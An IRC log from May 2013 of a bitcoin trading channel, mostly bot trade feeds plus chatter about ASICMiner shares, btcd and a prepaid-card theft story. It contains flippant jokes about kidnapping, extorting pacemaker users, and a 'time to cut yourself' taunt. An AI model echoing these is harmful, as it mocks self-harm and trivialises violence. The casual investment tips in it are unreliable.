wait, financial times knows shit ? May 10 02:31:13 haha yeah..jack shit. May 10 02:31:29 it was amusing..i'm off to read rags now because i'm all out of trilema May 10 02:31:38 i could use some pr0ns though. May 10 02:33:32 [BTCTC] [PAJKA.BOND] 10 @ 0.1053 = 1.053 BTC [-] May 10 02:34:26 [BTCTC] [BTC-BOND] 3 @ 0.010067 = 0.0302 BTC [+] May 10 02:34:51 [BTCTC] [BTC-BOND] 10 @ 0.010068 = 0.1007 BTC [+] May 10 02:34:58 [BTCTC] [BTC-BOND] 1 @ 0.01007 BTC [+] May 10 02:35:04 [BTCTC] [BTC-BOND] 11 @ 0.010079 = 0.1109 BTC [+] May 10 02:35:51 [MPEX] [S.MPOE] 7108 @ 0.00070973 = 5.0448 BTC [-] May 10 02:35:53 [MPEX] [S.MPOE] 1942 @ 0.00071189 = 1.3825 BTC [+] May 10 02:36:08 [HAVELOCK] [ASICM] 6 @ 0.01515 = 0.0909 BTC [-] May 10 02:37:08 [BTCTC] [ASICMINER-PT] 1 @ 1.47689 BTC [-] May 10 02:37:13 [BTCTC] [ASICMINER-PT] 11 @ 1.4769 = 16.2459 BTC [+] May 10 02:37:26 [BTCTC] [ASICMINER-PT] 17 @ 1.478 = 25.126 BTC [+] May 10 02:37:33 [BTCTC] [ASICMINER-PT] 13 @ 1.4788 = 19.2244 BTC [+] May 10 02:39:02 [BTCTC] [S.DICE-PT] 102 @ 0.003115 = 0.3177 BTC [+] May 10 02:39:41 [BTCTC] [S.DICE-PT] 105 @ 0.00312 = 0.3276 BTC [+] May 10 02:40:58 KRS1 http://polimedia.us/dtng/c/res/4584.html May 10 02:46:07 [HAVELOCK] [ASICM] 7 @ 0.01515 = 0.1061 BTC [-] May 10 02:46:16 [BTCTC] [GSDPT] 20 @ 0.002815 = 0.0563 BTC [-] May 10 02:46:18 [MPEX] [S.DICE] 80 @ 0.0033 = 0.264 BTC [-] May 10 02:48:33 [BTCTC] [PAJKA.BOND] 1 @ 0.1051 BTC [-] May 10 02:50:07 [HAVELOCK] [HIM] 4 @ 2.0001 = 8.0004 BTC [-] May 10 02:53:34 [BTCTC] [ASICMINER-PT] 1 @ 1.4788 BTC [+] May 10 02:54:34 [MPEX] [S.MPOE] 8100 @ 0.00071189 = 5.7663 BTC [+] May 10 02:55:18 ;;calc 1115/24 May 10 02:55:19 46.4583333333 May 10 02:55:21 cool May 10 02:59:09 [BTCTC] [S.DICE-PT] 300 @ 0.00312 = 0.936 BTC [+] May 10 03:00:09 [HAVELOCK] [ASICM] 3 @ 0.01515 = 0.0455 BTC [-] May 10 03:04:11 damn..what am i gonna do now I was kicked from #bitcoin-analysis..thanks copumpkin May 10 03:04:21 does he work for bfl or something May 10 03:04:25 I did nothing May 10 03:04:32 who then the other dude May 10 03:04:51 thats aight..i always have #bitcoin-anal May 10 03:05:06 i aint mad im just clownin May 10 03:06:37 sorry that i thought it was you but either way i didnt mean nothin by it May 10 03:06:58 i deserved it anyway..just bored..whats there to analyze with this flat fricken market May 10 03:07:06 :) May 10 03:07:18 it's not like you're banned anyway May 10 03:07:20 you can just rejoin May 10 03:07:33 yeh..true..maybe i'll go torture the troll box on btc-e for a while haha May 10 03:08:17 all you big buyers should fuck with the alt-coins while nothings going on May 10 03:09:08 [BTCTC] [ASICMINER-PT] 1 @ 1.4788 BTC [+] May 10 03:10:17 hm. i guess more ppl were following btc for entertainment than previously thought May 10 03:13:09 [BTCTC] [ASICMINER-PT] 1 @ 1.4845 BTC [+] May 10 03:14:08 [MPEX] [O.USD.C101T] 1000 @ 0.15361736 = 153.6174 BTC [-] May 10 03:14:10 [MPEX] [O.USD.C098T] 1000 @ 0.16182046 = 161.8205 BTC [-] May 10 03:17:07 [HAVELOCK] [ASICM] 97 @ 0.01525 = 1.4793 BTC [+] May 10 03:25:29 Hi Luke- May 10 03:25:38 Bye Luke- May 10 03:26:47 I sent Jody from BFL an email days ago and haven't received a response. I was only replying to their email to verify my shipment from them. May 10 03:33:08 [HAVELOCK] [ASICM] 7 @ 0.01512 = 0.1058 BTC [-] May 10 03:35:06 [MPEX] [S.MPOE] 8150 @ 0.00071189 = 5.8019 BTC [+] May 10 03:44:40 he does customer support too now ?! May 10 03:45:21 lol was gonna ask the same thing May 10 03:45:26 BFL_Luke-Jr May 10 04:06:08 [HAVELOCK] [ASICM] 425 @ 0.01452 = 6.171 BTC [-] May 10 04:06:09 [HAVELOCK] [ASICM] 150 @ 0.01451 = 2.1765 BTC [-] May 10 04:06:10 [HAVELOCK] [ASICM] 9 @ 0.01450001 = 0.1305 BTC [-] May 10 04:06:12 [HAVELOCK] [ASICM] 10 @ 0.0145 = 0.145 BTC [-] May 10 04:13:18 [BTCTC] [ASICMINER-PT] 68 @ 1.47 = 99.96 BTC [-] May 10 04:20:50 [MPEX] [O.USD.C101T] 1000 @ 0.15379797 = 153.798 BTC [+] May 10 04:20:51 [MPEX] [O.USD.C098T] 1000 @ 0.16201158 = 162.0116 BTC [+] May 10 04:32:08 [HAVELOCK] [SDICE] 1 @ 0.273 BTC [-] May 10 04:37:07 [HAVELOCK] [ASICM] 18 @ 0.0151 = 0.2718 BTC [+] May 10 04:41:08 [HAVELOCK] [VTX] 1 @ 0.40400081 BTC [+] May 10 04:42:07 [HAVELOCK] [ASICM] 50 @ 0.015055 = 0.7528 BTC [-] May 10 04:46:08 [HAVELOCK] [ASICM] 100 @ 0.0146 = 1.46 BTC [-] May 10 04:48:08 [HAVELOCK] [ASICM] 26 @ 0.015055 = 0.3914 BTC [+] May 10 04:49:08 [HAVELOCK] [ASICM] 65 @ 0.015055 = 0.9786 BTC [+] May 10 05:00:09 [HAVELOCK] [SDICE] 2 @ 0.2714 = 0.5428 BTC [-] May 10 05:05:08 [HAVELOCK] [ASICM] 30 @ 0.015055 = 0.4517 BTC [+] May 10 05:07:02 bfl delay is good for AM however once we get over 505 it would be nice if they ship me my units **** BEGIN LOGGING AT Fri May 10 13:23:20 2013 May 10 13:25:32 ;;ticker May 10 13:25:33 BTCUSD ticker | Best bid: 117.66001, Best ask: 118.21999, Bid-ask spread: 0.55998, Last trade: 117.66001, 24 hour volume: 42134.60734777, 24 hour low: 110.00000, 24 hour high: 119.96000, 24 hour vwap: 114.79891 May 10 13:30:02 [HAVELOCK] [SDICE] 1 @ 0.3 BTC [+] May 10 13:30:04 [HAVELOCK] [SDICE] 4 @ 0.3 = 1.2 BTC [+] May 10 13:50:33 hi all May 10 13:51:38 lol May 10 13:51:44 that's fine May 10 13:51:50 the app is coming along nicely May 10 13:51:56 working on some geolocation May 10 13:53:38 heya May 10 13:59:43 [BTCTC] [S.DICE-PT] 9 @ 0.00327 = 0.0294 BTC [+] May 10 14:00:03 [HAVELOCK] [ASICM] 300 @ 0.015 = 4.5 BTC [-] May 10 14:00:04 [HAVELOCK] [ASICM] 200 @ 0.015 = 3 BTC [-] May 10 14:09:10 mircea_popescu: you are right. heroes 3 was never as good as heroes 2 May 10 14:12:10 hey davout and mircea_popescu May 10 14:12:19 mjr_: hey May 10 14:12:46 congrats on your first cry out exchange sessions May 10 14:12:52 s/sessions/session/ May 10 14:13:06 whats that? May 10 14:13:11 sessions? May 10 14:13:16 by the way, meteor is amazing May 10 14:13:21 i am working on auth/users right now May 10 14:13:32 s/s\/sessions\/session\//s\/s$\/\/ May 10 14:13:40 [BTCTC] [ASICMINER-PT] 2 @ 1.4844 = 2.9688 BTC [-] May 10 14:13:44 your park exchange May 10 14:13:52 davout ty May 10 14:14:04 yes, think an LA chapter will be starting soon May 10 14:14:13 and i will be expanding to mon-fri May 10 14:14:24 speaking of which, anyone want to host ads on the site? May 10 14:14:37 or at least interested in looking into it? May 10 14:14:45 on which site ? May 10 14:15:52 sure. May 10 14:16:05 nice May 10 14:16:21 i think we will have off-exchange models for pre and post market May 10 14:16:31 working on geolocation stuff May 10 14:20:54 mjr_: are you going to comply with the Official Exchange Guidelines and Recommendations(c) ? May 10 14:24:01 [HAVELOCK] [ASICM] 1 @ 0.0155 BTC [+] May 10 14:30:02 [HAVELOCK] [ASICM] 37 @ 0.015 = 0.555 BTC [-] May 10 14:30:41 [BTCTC] [ASICMINER-PT] 1 @ 1.479 BTC [-] May 10 14:30:55 [BTCTC] [ASICMINER-PT] 1 @ 1.461001 BTC [-] May 10 14:32:57 [BTCTC] [ASICMINER-PT] 1 @ 1.456 BTC [-] May 10 14:33:08 [BTCTC] [ASICMINER-PT] 2 @ 1.4555 = 2.911 BTC [-] May 10 14:33:17 [BTCTC] [ASICMINER-PT] 1 @ 1.455 BTC [-] May 10 14:33:23 [BTCTC] [ASICMINER-PT] 1 @ 1.442001 BTC [-] May 10 14:33:29 [BTCTC] [ASICMINER-PT] 1 @ 1.442 BTC [-] May 10 14:33:34 [BTCTC] [ASICMINER-PT] 2 @ 1.44 = 2.88 BTC [-] May 10 14:35:02 [HAVELOCK] [ASICM] 15 @ 0.0155 = 0.2325 BTC [+] May 10 14:35:48 davout what be those magicks ? May 10 14:36:18 the OEGR(c) ? May 10 14:37:14 ye May 10 14:37:15 [BTCTC] [BITVPS] 1 @ 0.00109 BTC [+] May 10 14:38:03 just some new standards :-) May 10 14:38:35 mjr_: it should obvioulsy have http://xkcd.com/927/ on the cover page May 10 14:38:53 davout i think maybe you misunderstand what standards are :D May 10 14:39:02 [HAVELOCK] [ASICM] 9 @ 0.0155 = 0.1395 BTC [+] May 10 14:42:15 did you guys hear about the prepaid card $45mn theft? May 10 14:42:25 urlpls May 10 14:46:33 [BTCTC] [TAT.ASICMINER] 5 @ 0.0147 = 0.0735 BTC [-] May 10 14:52:18 [BTCTC] [TAT.ASICMINER] 5 @ 0.01489 = 0.0745 BTC [+] May 10 14:53:43 [BTCTC] [BITVPS] 1 @ 0.00108 BTC [-] May 10 14:53:49 [BTCTC] [BITVPS] 244 @ 0.001099 = 0.2682 BTC [+] May 10 14:53:54 [BTCTC] [BITVPS] 255 @ 0.0011 = 0.2805 BTC [+] May 10 15:06:47 kakobrekla: i have a fr one May 10 15:08:44 http://www.finextra.com/News/FullStory.aspx?newsitemid=24805 May 10 15:09:39 [BTCTC] [TAT.ASICMINER] 20 @ 0.0146 = 0.292 BTC [-] May 10 15:09:51 [BTCTC] [TAT.ASICMINER] 10 @ 0.01451 = 0.1451 BTC [-] May 10 15:10:45 nytimes story/version @ http://www.nytimes.com/2013/05/10/nyregion/eight-charged-in-45-million-global-cyber-bank-thefts.html?pagewanted=all May 10 15:11:26 the interesting part is that they didn't simply steal card numbers May 10 15:11:35 they actually hacked the balance checks May 10 15:12:05 [BTCTC] [S.DICE-PT] 481 @ 0.00327 = 1.5729 BTC [+] May 10 15:12:12 yes May 10 15:12:15 that was a cool story May 10 15:12:17 US Dollar hacked May 10 15:12:32 banks no longer worth using May 10 15:12:40 is how they would spin it in bitcoin world May 10 15:13:01 If I were a crime syndicate I would just hire hackers to steal btc, not dollars. May 10 15:14:03 deadweasel: where would you get 45m $ worth them? and in cash? May 10 15:14:28 ^ is why I'm not a crime syndicate. I need an accountant. May 10 15:14:42 no i mean actual meatspace delivery May 10 15:14:49 kidnap trendon shavers? May 10 15:15:06 I was thinking voorhees and MP should be fine. May 10 15:15:11 ;) May 10 15:15:26 but you'll end up with tainted coins May 10 15:15:49 shavers already laundered them i hope May 10 15:15:51 so wait, they can hack CCs but they cant cover their faces May 10 15:15:58 in front of atm camera May 10 15:16:43 weren't it masks? you know, trying to withdraw from atm in mask would cause alarm quickly May 10 15:16:56 or makeup May 10 15:17:24 not if you are on a bike May 10 15:18:16 seems they have caught only these two dudes... other 98 prolly had better plan May 10 15:20:04 yeah, fall guys. they're all fall guys at that level May 10 15:20:23 architects don't get their hands dirty. May 10 15:21:00 kakobrekla: I think that'd be the best way, helmet and and motorcycle. May 10 15:21:02 [HAVELOCK] [ASICM] 1 @ 0.01545 BTC [-] May 10 15:21:40 ofc, big guys embezzle with blessing of the govt. May 10 15:22:05 [BTCTC] [ASICMINER-PT] 1 @ 1.478999 BTC [+] May 10 15:22:38 kindappings and robbery is pretty desperate May 10 15:26:30 we're probably gonna see some bitcoin related kidnapping soon May 10 15:27:30 and that's kindof hard to protect yourself from May 10 15:28:44 3d printed guns? May 10 15:28:51 learn to fire a weapon dammit. May 10 15:28:59 over 120 again May 10 15:29:06 nice May 10 15:29:08 wonder if ill ever get my cheap coins... May 10 15:29:15 nope May 10 15:29:37 so... only at my house : "I'm thinking of buying this game http://machinarium.net/demo/" "you mean an account or the whole thing ?!" May 10 15:29:55 hehe May 10 15:30:26 well i guess ill ahve to order more hookers and blow... stupid fiat May 10 15:30:52 hahaha May 10 15:30:55 sounds like a plan May 10 15:31:43 that finish guy tricked me into thinking i was getting a good deal.. oh well May 10 15:33:41 i have no idea if i should convert some of my AM stock into btc or just hold and collect dividends, 20% of the network with 250th on the way is massive May 10 15:36:04 You should probably part with a few, just so you realize a bit of profit from the purchase. Hold the rest for divs and long term gains. May 10 15:36:24 but taking advice from me on these subjects is also not recommended. May 10 15:36:48 lol, nice disclaimer :) May 10 15:37:12 that is what i have been doing the whole way up, but i think i might just get rid of all my pt's at this point May 10 15:38:04 it was a pretty big div they had. but can they sustain it? difficulty will probably squelch divs in the future.. May 10 15:38:17 tehy are adding fast May 10 15:38:23 who else has asics? May 10 15:39:45 I don't know. All I know is that I don't know the future. But I know that right now you can realize some serious profit. May 10 15:40:40 [BTCTC] [TAT.ASICMINER] 10 @ 0.01485 = 0.1485 BTC [+] May 10 15:40:51 yeah May 10 15:41:09 i think ill just get rid of my pts slowly... May 10 15:41:16 hold the rest May 10 15:41:28 selling ltc as well (for btc) May 10 15:41:48 gox will take fucking age3s to get it on,. people will forget about gox and sell it off once they understand gox is fucking fail May 10 15:43:54 Hello May 10 15:44:24 I never believed Gox would add LTC May 10 15:44:28 ;;bc,stats May 10 15:44:32 Current Blocks: 235479 | Current Difficulty: 1.0076292883418716E7 | Next Difficulty At Block: 235871 | Next Difficulty In: 392 blocks | Next Difficulty In About: 2 days, 4 hours, 33 minutes, and 31 seconds | Next Difficulty Estimate: 11003971.7624 | Estimated Percent Change: 9.20655 May 10 15:44:42 and if they did, they would tuck it away in some corner for altcoiners May 10 15:45:16 Hello WILLdude May 10 15:47:09 i think gox w3ants to add ltc, i think they are just too much fail to do it (in the next 6 months) May 10 15:48:46 Urgh. I'm so confused about what to do atm May 10 15:49:12 whats the prob Will? May 10 15:51:03 Just not sure what to invest. May 10 15:51:19 Like buy an asic miner or buy shares in asicminer. May 10 15:51:37 It'll take at least 2 weeks to convince my parents. May 10 15:51:55 O_o May 10 15:52:48 will we break that massive 125 :/ May 10 15:53:24 hmm,,, speculating on btc realted stuff with parents money? May 10 15:53:30 how much were you thinking? May 10 15:53:37 25$ May 10 15:53:54 hi there, can anyone point me to some good reviews about bit4x.com ? Can't find it on forexpeacearmy and donnaforex doesn't exactly paint a good picture... May 10 15:54:01 [HAVELOCK] [ASICM] 8 @ 0.01539 = 0.1231 BTC [-] May 10 15:54:03 It's my money. May 10 15:54:25 bistro, join #bit4x May 10 15:54:33 bistro: I've been using it for ~5 months now, works great. kakobrekla runs it. May 10 15:55:55 5 months ago bitcoins were still cheap :-) May 10 15:56:10 5 months ago there was 100 btc min May 10 15:56:27 Is there pretty much a certainty of profit from ASICminer? May 10 15:56:55 nothing is certain Will May 10 15:57:02 if you are this worried May 10 15:57:12 my suggestion is just hold your bitcoins May 10 15:57:23 the stress of bitcoin value changing will be plenty for you May 10 15:57:28 no need to pile on more May 10 15:58:01 [HAVELOCK] [ASICM] 19 @ 0.01539 = 0.2924 BTC [-] May 10 15:59:26 Lol May 10 15:59:41 I am serious though May 10 15:59:56 few investments beat just holding onto your coins May 10 16:00:14 I'll think about it. May 10 16:00:22 ASICminer is an exception, but it could turn the other way without notice May 10 16:00:47 It looks reasonably profitable. May 10 16:00:57 Meh. May 10 16:00:58 once you dive into bitcoin stock investing, you dig yourself deeper May 10 16:01:09 now you worry about BTC value as well as stock value May 10 16:01:14 as well as dividends May 10 16:01:30 whch means you have to stay savvy on the news and prices for all those things May 10 16:01:37 this requires a lot of time May 10 16:01:54 bitcoin in general is a huge time eater May 10 16:02:01 consider all this May 10 16:02:02 how many btcs do you have will? May 10 16:02:04 buying bitcoin is a experiment himself May 10 16:02:11 Chaang-Noi: None. May 10 16:02:27 how much cash do you plan to spend May 10 16:02:33 £50 maybe May 10 16:02:44 so you want make a meta experiment ? May 10 16:03:08 Err. May 10 16:03:13 Anyway. May 10 16:03:15 Bye. May 10 16:03:18 you could spend like 10%of your cash on AM shares May 10 16:03:24 and dabble like thatr May 10 16:03:38 And get like 10p May 10 16:03:46 :) May 10 16:03:46 but at 50, i'd say just hold your coin May 10 16:04:11 Yeah Bye May 10 16:04:13 yes just hold your 50 pounds worth of btc May 10 16:04:13 [BTCTC] [TAT.ASICMINER] 95 @ 0.01489 = 1.4146 BTC [+] May 10 16:04:15 bye May 10 16:04:20 bye May 10 16:04:43 50 pounds? May 10 16:05:09 i dont have that on my scale May 10 16:05:25 is that more than a shovel of btc? May 10 16:06:15 [BTCTC] [TAT.ASICMINER] 19 @ 0.01495 = 0.2841 BTC [+] May 10 16:06:25 kakobrekla: teaspoon May 10 16:06:31 a. May 10 16:06:41 buy DEVC, you fell better with more coin :troll: May 10 16:12:57 more like a drop May 10 16:13:41 think is, if he takes his 50 quid and buys btc he will be well off in 10 years May 10 16:21:59 ./query mjr___ May 10 16:25:53 [BTCTC] [BITVPS] 45 @ 0.0011 = 0.0495 BTC [+] May 10 16:27:11 [BTCTC] [ASICMINER-PT] 1 @ 1.479 BTC [+] May 10 16:28:03 [BTCTC] [ASICMINER-PT] 1 @ 1.48 BTC [+] May 10 16:33:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.01489 BTC [-] May 10 16:48:08 i'm here May 10 16:49:11 did you guys hear that the us dollar was hacked? May 10 16:49:17 sell sell sell May 10 16:51:01 [HAVELOCK] [VTX] 4 @ 0.4449 = 1.7796 BTC [+] May 10 16:51:03 [HAVELOCK] [VTX] 11 @ 0.445 = 4.895 BTC [+] May 10 16:52:01 [HAVELOCK] [VTX] 9 @ 0.45 = 4.05 BTC [+] May 10 16:53:55 [BTCTC] [BITVPS] 244 @ 0.001001 = 0.2442 BTC [-] May 10 16:57:52 [BTCTC] [TAT.ASICMINER] 5 @ 0.01451 = 0.0726 BTC [-] May 10 16:58:07 [BTCTC] [TAT.ASICMINER] 9 @ 0.0145 = 0.1305 BTC [-] May 10 17:04:01 [HAVELOCK] [ASICM] 3 @ 0.01539 = 0.0462 BTC [-] May 10 17:09:26 [BTCTC] [BITVPS] 70 @ 0.001 = 0.07 BTC [-] May 10 17:10:58 [BTCTC] [TAT.ASICMINER] 5 @ 0.0145 = 0.0725 BTC [-] May 10 17:16:06 [BTCTC] [ASICMINER-PT] 1 @ 1.484 BTC [+] May 10 17:16:31 [BTCTC] [TAT.ASICMINER] 5 @ 0.01488 = 0.0744 BTC [+] May 10 17:16:43 [BTCTC] [TAT.ASICMINER] 2 @ 0.01489 = 0.0298 BTC [+] May 10 17:17:54 ;;ticker May 10 17:17:55 BTCUSD ticker | Best bid: 119.65000, Best ask: 119.66665, Bid-ask spread: 0.01665, Last trade: 119.66665, 24 hour volume: 65134.62083595, 24 hour low: 111.10174, 24 hour high: 122.50000, 24 hour vwap: 116.88060 May 10 17:18:05 ;;obip 2000 May 10 17:18:08 The weighted average price of BTC, 2000.0 coins up and down from the spread, is 120.43872 USD. | Data vintage: 0.0006 seconds May 10 17:18:32 [BTCTC] [ASICMINER-PT] 2 @ 1.48435 = 2.9687 BTC [+] May 10 17:22:03 [BTCTC] [ASICMINER-PT] 2 @ 1.4845 = 2.969 BTC [+] May 10 17:26:36 [BTCTC] [BITVPS] 100 @ 0.00085 = 0.085 BTC [-] May 10 17:31:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.01489 BTC [+] May 10 17:39:41 [BTCTC] [ASICMINER-PT] 1 @ 1.199 BTC [-] May 10 17:47:57 [BTCTC] [ASICMINER-PT] 2 @ 1.4879 = 2.9758 BTC [+] May 10 17:49:01 [HAVELOCK] [ASICM] 10 @ 0.01529 = 0.1529 BTC [-] May 10 17:49:01 [HAVELOCK] [ASICM] 10 @ 0.01535 = 0.1535 BTC [+] May 10 17:49:03 [HAVELOCK] [ASICM] 70 @ 0.01539 = 1.0773 BTC [+] May 10 17:49:04 [HAVELOCK] [ASICM] 9 @ 0.01545 = 0.1391 BTC [+] May 10 17:49:05 [HAVELOCK] [ASICM] 1 @ 0.0155 BTC [+] May 10 17:52:01 [HAVELOCK] [ASICM] 6 @ 0.01505 = 0.0903 BTC [-] May 10 17:53:39 [BTCTC] [TAT.ASICMINER] 5 @ 0.01451 = 0.0726 BTC [-] May 10 18:00:14 ;;obip May 10 18:00:15 (obip ) -- Calculate the "order book implied price", by finding the weighted average price of coins BTC up and down from the spread. May 10 18:00:50 ;;obip 1 May 10 18:00:54 The weighted average price of BTC, 1.0 coins up and down from the spread, is 121.64500 USD. | Data vintage: 0.0000 seconds May 10 18:01:00 ;;obip 100 May 10 18:01:00 The weighted average price of BTC, 100.0 coins up and down from the spread, is 121.49649 USD. | Data vintage: 6.0440 seconds May 10 18:01:17 ;;obip 2000 May 10 18:01:17 The weighted average price of BTC, 2000.0 coins up and down from the spread, is 120.91473 USD. | Data vintage: 22.9384 seconds May 10 18:01:51 whose wacky idea was obip? May 10 18:05:01 [HAVELOCK] [SDICE] 1 @ 0.296 BTC [-] May 10 18:06:01 [HAVELOCK] [SDICE] 1 @ 0.295 BTC [-] May 10 18:07:00 [HAVELOCK] [ASICM] 1 @ 0.0154 BTC [+] May 10 18:09:00 [HAVELOCK] [ASICM] 14 @ 0.0154 = 0.2156 BTC [+] May 10 18:09:25 i dunno benkay. May 10 18:09:31 it's not terribly helpful. May 10 18:09:53 [BTCTC] [S.DICE-PT] 10 @ 0.00327 = 0.0327 BTC [+] May 10 18:10:03 [BTCTC] [S.DICE-PT] 50 @ 0.00311 = 0.1555 BTC [-] May 10 18:10:08 assbot> [BTCTC] [ASICMINER-PT] 1 @ 1.199 BTC [-] wtf is that? May 10 18:10:13 [BTCTC] [S.DICE-PT] 50 @ 0.0031 = 0.155 BTC [-] May 10 18:10:22 it's someone exercising an option May 10 18:10:27 oh May 10 18:10:32 [BTCTC] [S.DICE-PT] 98 @ 0.003 = 0.294 BTC [-] May 10 18:11:00 [HAVELOCK] [ASICM] 24 @ 0.0155 = 0.372 BTC [+] May 10 18:11:06 he wanted to sell at 1.19? May 10 18:11:38 couldve been written a month ago May 10 18:12:45 havelock has been active, btctc not so much May 10 18:13:01 selling much higher as well May 10 18:13:06 So far havelock has sold a LOT more May 10 18:13:17 BTCT did pretty good the first few days May 10 18:13:22 Bitfunder has lagged May 10 18:13:43 referring to my assets May 10 18:13:52 but i assume the whole-shares ones are similar May 10 18:14:20 you are the first and only on havelock i assume? May 10 18:15:27 correct May 10 18:15:52 i think that has something to do with it May 10 18:15:55 yeah May 10 18:16:05 and the Havelock users seem to be a little separated May 10 18:16:15 maybe canadians only wanna use a caladian site May 10 18:16:15 yeah May 10 18:16:27 canadian site* May 10 18:16:44 another interesting angle, May 10 18:16:52 is that the less assets the echange has May 10 18:16:54 the more it sells May 10 18:17:22 this holds true with mpex too May 10 18:17:27 [MPEX] [S.DICE] 1950 @ 0.00324362 = 6.3251 BTC [-] May 10 18:18:34 although mpex stock volume has been fairly low lately i think May 10 18:18:48 they could use a new asset May 10 18:18:56 to sprak things up again May 10 18:19:07 possibly why mp is sore at AM May 10 18:19:26 since AM is probly the only biz that currently qualifies May 10 18:21:25 https://blog.conformal.com/btcd-a-bitcoind-alternative-written-in-go/ May 10 18:21:33 i'm going to switch as soon as possible May 10 18:22:20 markets are crazy today May 10 18:22:24 not just bitcoin May 10 18:22:39 taub: yep May 10 18:23:19 GOOG at $875 May 10 18:23:20 :) May 10 18:23:29 crash on monday May 10 18:23:44 Google I/O is next weej May 10 18:23:46 week May 10 18:23:55 might still go up then May 10 18:26:54 ohmigodyouguise May 10 18:27:00 [HAVELOCK] [ASICM] 1 @ 0.01505001 BTC [-] May 10 18:27:00 pacemakers are hackable May 10 18:27:01 [HAVELOCK] [ASICM] 5 @ 0.01505 = 0.0753 BTC [-] May 10 18:27:02 [HAVELOCK] [ASICM] 1 @ 0.015 BTC [-] May 10 18:27:03 [HAVELOCK] [ASICM] 2 @ 0.01495 = 0.0299 BTC [-] May 10 18:27:04 [HAVELOCK] [ASICM] 125 @ 0.0149 = 1.8625 BTC [-] May 10 18:27:05 [HAVELOCK] [ASICM] 491 @ 0.01475 = 7.2423 BTC [-] May 10 18:27:17 lets hold all of the old people ransom for bitcoins May 10 18:28:04 nobody with a pacemaker has any bitcoins. and nobody would give up their bitcoins to save someone with a pacemaker. May 10 18:32:00 [HAVELOCK] [ASICM] 5 @ 0.0149 = 0.0745 BTC [+] May 10 18:32:01 [HAVELOCK] [ASICM] 500 @ 0.0148 = 7.4 BTC [-] May 10 18:35:01 [HAVELOCK] [ASICM] 1 @ 0.015 BTC [+] May 10 18:38:14 mjr_ apparently that is just one part of bitcoind May 10 18:43:30 kakobrekla: what do you mean? its a port of bitcoind to go (the language google made) May 10 18:43:42 i had a talk with them yest for a while May 10 18:43:55 its just the wire part of the bitcoind May 10 18:43:56 [BTCTC] [ASICMINER-PT] 1 @ 1.485 BTC [-] May 10 18:43:59 or something like that May 10 18:44:08 [BTCTC] [ASICMINER-PT] 1 @ 1.488 BTC [+] May 10 18:46:20 they plan on having the whole implementation May 10 18:46:22 in fact... May 10 18:46:48 https://opensource.conformal.com/wiki/btcd May 10 18:47:00 alternative full-node implementation of the bitcoin protocol written in Go May 10 18:47:09 i will switch as soon as its done May 10 18:47:17 i want to have an alternative client May 10 18:47:18 they claimed otherwise May 10 18:47:26 plus GO is a kick ass language May 10 18:47:36 taht people are being cofused and only the wire part of the bitcoind is being done May 10 18:47:41 no May 10 18:47:47 that is one package May 10 18:47:49 that is what the devs said mjr May 10 18:47:59 im not making shit up May 10 18:48:00 that is one package that they are working on May 10 18:48:04 like usually May 10 18:48:05 i'm saying look at the site May 10 18:48:15 they are going to do the entire project in go May 10 18:48:23 its not done yet, only the wire portion is done now May 10 18:48:45 the project "btcd" is a full replacement of bitcoin-qt May 10 18:48:53 will be May 10 18:49:01 perhaps May 10 18:49:03 :) May 10 18:49:05 the project btcwire (package for the wire protocol) is done now May 10 18:49:23 they also have the following packages coming soon: btcjson, btcdb May 10 18:49:32 mkay May 10 18:49:39 anyways, once they have a full replacement, i will switch immediately May 10 18:49:53 i want to show those devs that we dont' have to use their software May 10 18:50:10 AND what if their version does not set an arbitrary number like 5402 May 10 18:50:18 maybe more people switch May 10 18:50:29 which would be awesome May 10 18:50:41 eh? May 10 18:50:47 you can fork your own N May 10 18:51:20 that still does not achieve the goal of smaller than 5402 tx May 10 18:53:35 depends on what the miners accept May 10 18:53:44 i meant that i can mine my own blocks that include them May 10 18:54:08 [HAVELOCK] [SDICE] 1 @ 0.27100001 BTC [-] May 10 18:54:12 because mostly the issue is that you are setting default settings values May 10 18:54:36 so if someone eles's codes leaves the values at other values (default accept vs default reject) May 10 18:56:00 [HAVELOCK] [ASICM] 18 @ 0.015 = 0.27 BTC [+] May 10 18:57:01 in other news, usg cares more about 3d printed firearms than virtual currencies May 10 18:57:03 huzzah May 10 18:59:00 mjr_ yea May 10 18:59:12 it would be cool if there was a pool May 10 18:59:17 with several bitcoinds runnin May 10 18:59:24 with different settings May 10 18:59:33 and you could just select what settings you are mining May 10 18:59:44 no? May 10 19:05:11 [BTCTC] [ASICMINER-PT] 1 @ 1.488 BTC [+] May 10 19:10:07 [BTCTC] [ASICMINER-PT] 1 @ 1.488 BTC [+] May 10 19:10:22 [BTCTC] [ASICMINER-PT] 1 @ 1.47 BTC [-] May 10 19:18:52 [BTCTC] [BITVPS] 100 @ 0.00089 = 0.089 BTC [+] May 10 19:21:00 [HAVELOCK] [ASICM] 6 @ 0.015 = 0.09 BTC [+] May 10 19:22:00 [HAVELOCK] [ASICM] 50 @ 0.0151 = 0.755 BTC [+] May 10 19:25:37 http://i.imgur.com/Gg5cQ0w.jpg May 10 19:27:57 [BTCTC] [TAT.ASICMINER] 3 @ 0.01488 = 0.0446 BTC [+] May 10 19:28:00 [HAVELOCK] [SDICE] 10 @ 0.297 = 2.97 BTC [+] May 10 19:30:00 [HAVELOCK] [SDICE] 6 @ 0.3 = 1.8 BTC [+] May 10 19:34:01 [HAVELOCK] [SDICE] 1 @ 0.3 BTC [+] May 10 19:35:12 [MPEX] [S.DICE] 1600 @ 0.0032 = 5.12 BTC [-] May 10 19:36:09 [BTCTC] [ASICMINER-PT] 2 @ 1.4701 = 2.9402 BTC [+] May 10 19:36:55 [BTCTC] [PAJKA.BOND] 8 @ 0.10535 = 0.8428 BTC [+] May 10 19:37:31 Jurov, I see you bidding on dem AM shares ;) May 10 19:38:02 good price, maybe i can flip them May 10 19:38:24 you will May 10 19:38:36 I think 2btc is on the horizon May 10 19:42:58 Hello. May 10 19:43:00 [HAVELOCK] [SDICE] 1 @ 0.301 BTC [+] May 10 19:43:15 Hello May 10 19:43:49 No reply from the guy who offered me work on reddit yet. May 10 19:44:12 time to cut yourself May 10 19:44:35 [BTCTC] [PAJKA.BOND] 5 @ 0.10535 = 0.5268 BTC [+] May 10 19:44:59 [HAVELOCK] [KCIM] 6 @ 1.46 = 8.76 BTC [-] May 10 19:45:37 ThickAsThieves: Please, don't joke about that. May 10 19:45:55 ok May 10 19:48:55 [BTCTC] [COGNITIVE] 1 @ 0.246479 BTC [+] May 10 19:48:59 [HAVELOCK] [SDICE] 1 @ 0.302 BTC [+] May 10 19:50:06 